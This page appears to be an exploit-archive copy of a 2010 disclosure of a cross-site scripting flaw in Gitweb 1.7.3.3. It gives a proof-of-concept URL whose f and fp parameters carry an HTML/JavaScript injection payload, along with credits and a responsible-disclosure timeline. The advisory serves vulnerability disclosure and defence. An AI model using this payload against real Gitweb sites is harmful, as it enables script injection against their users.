Skip to content
cyberexploits
webappwebtext

Gitweb 1.7.3.3 - Cross-Site Scripting

Gitweb 1.7.3.3 - Cross-Site Scripting

Publié le 2010-12-15

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/cgi/webapps/15744.txt7eac4c3a
raw
>-8 Description 8-<

Cross-site scripting (XSS) vulnerability in Gitweb 1.7.3.3 and previous versions

allows remote attackers to inject arbitrary web script or HTML code via f and fp variables.



>-8 Proof Of Concept 8-<

http://localhost/?p=foo/bar/ph33r.git;a=blobdiff;f=[XSS];fp=[XSS]

[XSS] => "><body onload="alert('xss')"> <a





>-8 Credits 8-<

Emanuele 'emgent' Gentili <e.gentili@tigersecurity.it>





>-8 Responsible Disclosure 8-<



13-12-2010	Initial contact with upstream and vendor-sec

13-12-2010	Vendor Response and CVE-2010-3906 assignation

15-12-2010	Public Disclosure
Voir sur GitHub
Gitweb 1.7.3.3 - Cross-Site Scripting · CyberExploits